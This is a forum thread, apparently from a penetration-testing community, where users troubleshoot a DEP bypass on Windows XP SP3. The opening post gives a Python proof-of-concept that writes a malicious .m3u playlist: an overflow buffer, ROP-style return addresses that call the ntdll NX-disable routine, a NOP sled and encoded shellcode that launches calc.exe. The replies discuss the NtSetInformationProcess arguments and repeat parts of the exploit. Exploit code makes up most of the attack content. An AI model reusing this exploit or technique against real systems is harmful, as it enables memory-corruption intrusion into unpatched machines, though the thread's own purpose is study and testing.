Help bypassing DEP windows XP SP3

**wasto** · 12-31-2010, 06:50 AM

I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until i run the routine to disable NX (7c91cd44). when the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?

Code:

filename = "disabledep.m3u"

# calc.exe
shellcode =( 
"\xda\xd3\xb8\xa4\x9b\x9d\x4a\xd9\x74\x24\xf4\x2b\xc9\xb1\x33"
"\x5b\x31\x43\x17\x03\x43\x17\x83\x67\x9f\x7f\xbf\x9b\x48\xf6"
"\x40\x63\x89\x69\xc8\x86\xb8\xbb\xae\xc3\xe9\x0b\xa4\x81\x01"
"\xe7\xe8\x31\x91\x85\x24\x36\x12\x23\x13\x79\xa3\x85\x9b\xd5"
"\x67\x87\x67\x27\xb4\x67\x59\xe8\xc9\x66\x9e\x14\x21\x3a\x77"
"\x53\x90\xab\xfc\x21\x29\xcd\xd2\x2e\x11\xb5\x57\xf0\xe6\x0f"
"\x59\x20\x56\x1b\x11\xd8\xdc\x43\x82\xd9\x31\x90\xfe\x90\x3e"
"\x63\x74\x23\x97\xbd\x75\x12\xd7\x12\x48\x9b\xda\x6b\x8c\x1b"
"\x05\x1e\xe6\x58\xb8\x19\x3d\x23\x66\xaf\xa0\x83\xed\x17\x01"
"\x32\x21\xc1\xc2\x38\x8e\x85\x8d\x5c\x11\x49\xa6\x58\x9a\x6c"
"\x69\xe9\xd8\x4a\xad\xb2\xbb\xf3\xf4\x1e\x6d\x0b\xe6\xc6\xd2"
"\xa9\x6c\xe4\x07\xcb\x2e\x62\xd9\x59\x55\xcb\xd9\x61\x56\x7b"
"\xb2\x50\xdd\x14\xc5\x6c\x34\x51\x39\x27\x15\xf3\xd2\xee\xcf"
"\x46\xbf\x10\x3a\x84\xc6\x92\xcf\x74\x3d\x8a\xa5\x71\x79\x0c"
"\x55\x0b\x12\xf9\x59\xb8\x13\x28\x3a\x5f\x80\xb0\x93\xfa\x20"
"\x52\xec")

  
junk = "\x41" * 1024
adjust_ebp = "\xEA\xE3\xB5\x7C"			# PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
disabledep = "\xff\xff\xff\xff"			# offset for adjust_ebp (ret 4)
disabledep += "\xA0\x25\x91\x7C"		# 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
disabledep += "\xff\xff\xff\xff"
disabledep += "\x44\xCD\x91\x7C"		# 7C91CD44 CMP AL,1 -> run NX Disable routine 
disabledep += "\xD7\x30\x9D\x7C"		# 7C9D30D7 JMP ESP
nop = "\x90" * 100          
 
file = open(filename , 'w')
file.write(junk + adjust_ebp + disabledep + nop + shellcode)
file.close()

raw_input("\nPress any key to exit...")

**compaq** · 01-01-2011, 11:21 AM

Hi this doesn't directly answer your question, but check out ROT

I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until i run the routine to disable NX (7c91cd44). when the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?

Does your program have permission to access that function, is edx point to a struct of the values passed, is eax passing 0x22. try setting a break point before Setinfo change eax to 0x22 and edx to struct and jmp to fastsystemcall and see if the values are the same

eg

string:dir/p/a
system(string)

change to
push string
push esp
push ebp ---------------> might be back to frount
push system address---->
jmp to ret

it is system specfic and network connection will be difficult but, added users and such should be a proable
coffee

http://www.ctyme.com/intr/rb-4249.htm

**wasto** · 01-01-2011, 04:29 PM

it looks like the call to zwSetInformationProcess does not clear the stack so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?

**deb0and** · 01-02-2011, 07:22 AM

To disable DEP for a process you need to make a all to NtSetInformationProcess() with the ProcessInformationClass set to ProcessExecuteFlags (0x22) and the ProcessInformation marker set to MEM_EXECUTE_OPTION_ENABLE (0x2)

**compaq** · 01-02-2011, 11:52 AM

it looks like the call to zwSetInformationProcess does not clear the stack so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?

junk = "\x41" * 101c

jmp to shellcode eb ** = 0x12345678

adjust_ebp = "\xEA\xE3\xB5\x7C" # PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
disabledep = "\xff\xff\xff\xff" # offset for adjust_ebp (ret 4)
disabledep += "\xA0\x25\x91\x7C" # 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
disabledep += "\xff\xff\xff\xff"
disabledep += "\x44\xCD\x91\x7C" # 7C91CD44 CMP AL,1 -> run NX Disable routine

jmp to jmp shellcode 0x12345678 ,below sets ebp to this
disabledep += "\xD7\x30\x9D\x7C" # 7C9D30D7 JMP ESP
jmp to ret = then jmps to jmp esp, and sets ebp to above

can you copy a pic of the debugger

nop = "\x90" * 100

BackTrack Linux - Penetration Testing Distribution

Thread: Help bypassing DEP windows XP SP3

Thread Tools

Search Thread

Display

Help bypassing DEP windows XP SP3

Re: Help bypassing DEP windows XP SP3

Re: Help bypassing DEP windows XP SP3

Re: Help bypassing DEP windows XP SP3

Re: Help bypassing DEP windows XP SP3

Similar Threads

Bypassing ASP validaterequest?

Bypassing Firewalls in Ettercap + Wireshark

Bypassing Mac filter

Looking for programming pointers- bypassing authentication

Bypassing cisco PIX IOS v6.x.x with nmap question

Posting Permissions